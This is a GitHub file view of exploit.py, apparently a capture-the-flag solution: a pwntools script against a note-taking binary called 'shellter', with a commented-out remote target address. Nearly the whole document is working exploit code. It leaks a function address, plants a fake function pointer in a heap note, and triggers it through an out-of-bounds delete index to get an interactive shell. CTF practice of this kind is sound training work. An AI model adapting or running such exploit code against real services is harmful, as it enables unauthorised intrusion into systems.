-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.py
55 lines (37 loc) · 1.01 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
r = process("./shellter")
#r = remote("51.15.73.163", 8088)
def menu():
return r.recvuntil("choice > ")
def create(content):
r.sendline("1")
r.recvuntil("Enter content > ")
r.send(content)
r.recvuntil("Created at ")
s = r.recvuntil(" !")
return int(s[:-2], 16)
def delete(index):
r.sendline("2")
r.recvuntil("delete note > ")
r.sendline(str(index))
def help():
r.sendline("3")
r.recvuntil("located at ")
return int(r.recvline()[:-1], 16)
menu()
help_func_addr = help()
get_shell_addr = help_func_addr - (0xc1a-0xa30)
info("get_shell: %s" % hex(get_shell_addr))
menu()
chunk_addr = create("A"*8)
info("chunk_addr: %s" % hex(chunk_addr))
next_chunk_addr = chunk_addr + 0x100
info("next_chunk: %s" % hex(next_chunk_addr))
menu()
# create a fake function pointer -> &get_shell
evil_chunk_addr = create(p64(next_chunk_addr+0x10) + p64(get_shell_addr))
menu()
elems_addr = get_shell_addr + 0x201610
evil_index = ((evil_chunk_addr + 0x8) - elems_addr) / 8
delete(evil_index)
r.interactive()